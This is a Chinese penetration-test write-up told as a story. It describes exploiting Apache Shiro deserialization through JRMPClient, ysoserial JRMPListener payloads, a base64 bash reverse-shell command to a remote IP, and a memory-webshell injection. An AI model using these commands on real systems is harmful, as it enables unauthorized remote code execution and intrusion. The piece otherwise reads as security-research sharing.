实战|记一次shiro有key无常规链的打法

admin 2024年4月19日17:52:35评论20 views字数 2320阅读7分44秒阅读模式

一、前言

本公众号仅用作技术研究,利用此文提及到的知识造成的任何直接或者间接的后果及损失均由使用者本人负责,本人不为此承担任何责任,本文中涉及的漏洞复现,均是自己搭建的本地靶场,禁止非法攻击未授权站点

二、故事起因

       今天分享一件小帅追求小美的时候,为了获取小美的芳心,拿下某个网站的故事。在一个风和日丽的下午,闲着无聊的小帅接到了小美给的一个项目,要求是需要在一天内,尽可能的找到漏洞,然后交付给小美。

小帅看在小美这么美的份上,那肯定要卯足吃奶的劲,全力以赴的对这个目标站点发起一个攻击,找到一些有价值的漏洞,争取拿下这个网站,小帅想通过这样子的方式,来获取小美的芳心,像拿下网站一样,拿下小美。
对于小帅的这种做法,水泥封心的我只能说:“小帅你要三思而后行啊,舔狗舔到最后一无所有啊!”

实战|记一次shiro有key无常规链的打法

打开目标地址,映入眼帘的就是如下界面,因为涉及到网络安全的法律法规,所以在重要的地方厚码见谅!此篇文章只是提供一个思路,不要对未授权的站点进行一个非法测试!!!不要对未授权的站点进行一个非法测试!!!不要对未授权的站点进行一个非法测试!!!重要的事情说三遍!

实战|记一次shiro有key无常规链的打法

三、漏洞探测

小帅心里想,拿到这种是后台登录的站点,首当其冲的就是需要尝试一下弱口令,小帅就利用自己之前写的后台弱口令爆破的脚本跑了一下,发现一个都没有成功,所以这一条弱口令的路暂时放一放,看一下其他的测试点

来到F12大法,查看一些JS文件,看了半天,测试了半天,也是鸡毛都没有,果断放弃。

这个时候,小帅打开了他的必杀技,burpsuite工具,打算进行数据包一个一个的查看,就像看国产电影大作一样,瞪着大眼睛,目不转睛的看。突然burpsuite上的shiro插件闪了一下,发现这个网站存在shiro框架,并获取到了key,看下图:

实战|记一次shiro有key无常规链的打法

小帅这时候顿时轻松,心想“终于可以不用提交水洞的报告了,这回小美对他的好感度又一次增加了吧”。二话没说,就把这个目标站点放在shiro梭哈的工具里面跑了一下,不跑不知道,一跑让小帅再一次的心情失落。这个shiro有key,但是怎么没有可以攻击的链子呢??

实战|记一次shiro有key无常规链的打法

完蛋,对于一个安抚仔的小帅来说,没链子怎么玩,拿不下这个网站,那还怎么能获取小美的芳心啊。

实战|记一次shiro有key无常规链的打法

四、JRMPClient监听

就在这千钧一发之际,小帅脑海里闪现了无数个小美的画面,并给了小帅无穷的力量;小帅反手掏出shiro_tool这一款工具,看看可不可以用JRMPClient来利用。

java -jar shiro_tool http://127.0.0.1

    发现JRMPClient是存在的,看下图:

实战|记一次shiro有key无常规链的打法

    接下来就在vps上利用ysoserial起一个JRMPListener,监听的端口是1238,链子用CommonsBeanutils2_183 命令如下:

java -cp ysoserial-for-woodpecker-0.5.2.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1238 CommonsBeanutils2_183 "raw_cmd:ping wwwww.ifzx.callback.red"

实战|记一次shiro有key无常规链的打法

    然后在shiro_tool那边输入5 再输入自己vps的地址和刚才监听的端口实战|记一次shiro有key无常规链的打法

实战|记一次shiro有key无常规链的打法

实战|记一次shiro有key无常规链的打法

    通过之前网站大小写敏感,初步判断是linux系统,然后再加上下面执行的命令,返回来的是“root”当时就断定这个系统就是linux系统,(这里的这个点,其实是判断错误的,这个到后面会说)看下图:

实战|记一次shiro有key无常规链的打法

    所以当时想着直接反弹shell,命令如下:

java -cp ysoserial-for-woodpecker-0.5.2.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1445 CommonsBeanutils2_183 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIxLjEyNy45MC82NzY3IDA+JjE=}|{base64,-d}|{bash,-i}

    但是死活反弹shell不了,试了半天,都不行。可以执行命令,那写文件?但是网站的路径不知道,webshell不知道往哪里写。所以这条路也行不通。那就直接打内存马吧,说干就干。

五、打内存马

打开jmg-gui这一款工具,然后生成一个内存马的class文件,配置看下图:

实战|记一次shiro有key无常规链的打法

java -cp ysoserial-for-woodpecker-0.5.2.jar me.gv7.woodpecker.yso.exploit.JRMPListener 1321 CommonsBeanutils2_183 "class_file:/home/ubuntu/3.1/ImageUtil.class"

    把生成的class文件,放在vps上,然后利用上面的命令执行;接着在shiro_tool上填上vps:监听端口,然后用哥斯拉直接连接,成功!

    这时,小帅悬着的心终于落下来了,终于可以拿着这个去献给小美了。

实战|记一次shiro有key无常规链的打法

六、踩坑点

what?怎么是windows系统呢?之前dnslog回显出来的不是 ‘root’ 吗?是什么原因。经过一番查阅知道,在vps上执行的命令,ping `whoami`dnslog地址 ,其实这个whoami执行的是vps的,而不是真正目标系统的。因为这其中有个中转的问题,并且windows系统根本没有ping `whoami`这种指令。

实战|记一次shiro有key无常规链的打法

好了,小帅为了获取小美芳心的故事就分享到这里了,谢谢大家的耐心观看!
实战|记一次shiro有key无常规链的打法
点击上方蓝字关注我们

原文始发于微信公众号(Max安全研究院):实战|记一次shiro有key无常规链的打法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日17:52:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|记一次shiro有key无常规链的打法http://cn-sec.com/archives/2673175.html

发表评论

匿名网友 填写信息